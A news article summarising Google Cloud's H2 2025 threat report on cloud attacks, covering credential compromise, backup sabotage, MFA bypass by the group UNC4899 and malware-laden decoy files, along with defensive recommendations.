Google Cloud warns backup systems face rising cyber threats

Google Cloud has published its latest Cloud Threat Horizons Report H2 2025, detailing key trends and findings around cyber threats targeting cloud environments worldwide.

The report draws on analysis conducted by Google Cloud's Office of the CISO, Google Threat Intelligence Group (GTIG), Mandiant Consulting, and internal security teams. It underscores the increasing sophistication of threat actors and the growing risk that organisations face.

Credential compromise and misconfiguration

Analysis indicates that credential-based attacks remain the most prevalent threat vector within cloud ecosystems. According to the report, weak or absent credentials were responsible for 47.1% of recorded cloud incidents during the period under review. Misconfigurations contributed to 29.4% of incidents, while compromises via API or user interface accounted for 11.8%.

The report notes that these figures highlight the persistent vulnerabilities in identity management and system configuration, which malicious actors continue to exploit at scale.

Backup systems under direct attack

One new trend identified is the direct targeting of backup infrastructure by financially motivated threat actors. Google Cloud's security experts observed a pattern of backup system sabotage, including deletion of automated backup routines, data corruption, and manipulation of permissions.

"Financially motivated threat actors have escalated tactics, sabotaging backup systems by deleting routines, corrupting data, and manipulating permissions to disrupt recovery and force ransom payouts."

Such activity is intended to hinder organisations from recovering after an incident, increasing the leverage available to attackers in extortion attempts.

MFA bypass by social engineering

The report outlines the emergence of advanced social engineering campaigns that result in multi-factor authentication (MFA) bypass. These attacks involve techniques such as credential theft and session cookie hijacking.

A particular focus is given to groups aligned with North Korea. The report singles out UNC4899, also known as TraderTraitor, for its efforts targeting cryptocurrency platforms.

"Sophisticated social engineering attacks are enabling MFA bypass, including credential and session cookie theft - especially by North Korea‐aligned group UNC4899 (TraderTraitor) targeting crypto‐asset platforms."

Abuse of trusted cloud services

Increased exploitation of mainstream cloud and code-hosting services for malware delivery is highlighted by the report. Attackers are reported to be hosting decoy files - such as .desktop files disguised as PDFs - on platforms including Google Drive, GitHub, and Dropbox. These files are designed to trigger silent malware downloads in the background when accessed.

"Attackers increasingly exploit platforms like Google Drive, GitHub, Dropbox, and others to host decoy files (e.g., .desktop files masquerading as innocuous PDFs) that trigger background malware downloads."

Such activity makes detection more complex due to the abuse of otherwise trusted platforms.

Evolving persistence and evasion techniques

The publication describes a shift in threat actor tactics towards advanced evasion and persistence strategies. These include efforts to compromise the integrity of recovery chains and supply chain systems, threatening not just data but the infrastructure designed to facilitate post-incident recovery.

Expert recommendations

Google Cloud security experts emphasise a multi-layered defence approach. Recommendations include strengthening identity and access management practices, prioritising least-privilege principles, enforcing robust credential hygiene, and implementing credential leak detection mechanisms.

The report advocates for isolating recovery environments to counter backup sabotage. For instance, Cloud Isolated Recovery Environments (CIRE) can provide additional protection for backup data and help ensure recovery capabilities remain intact after an attack.

Vigilance for signs of threat activity is also recommended, particularly with respect to deployment of decoy files and potential MFA bypass attempts enabled via deceptive use of cloud services.

Addressing supply chain risk and developer ecosystem security is identified as a further requirement. Google Cloud recommends validation mechanisms - such as Verified CRX Upload for Chrome extensions - as means of preventing malicious software updates within cloud ecosystems.

Shifting strategic priorities for defenders

The report argues that as organisations increasingly transition to cloud-native environments, attackers have adapted their playbook in response. The new focus targets recovery and backup systems as primary objectives, requiring companies to improve their security posture not only around data, but also recovery infrastructure.

"The report underscores that recovery systems are now primary targets, signalling an urgent need for stronger defensive posture across identity, access, and infrastructure resilience."

Google Cloud's Cloud Threat Horizons Report H2 2025 is designed to equip security leaders and practitioners with intelligence-backed insights to respond proactively to these developing threats by implementing appropriate mitigation and defence mechanisms.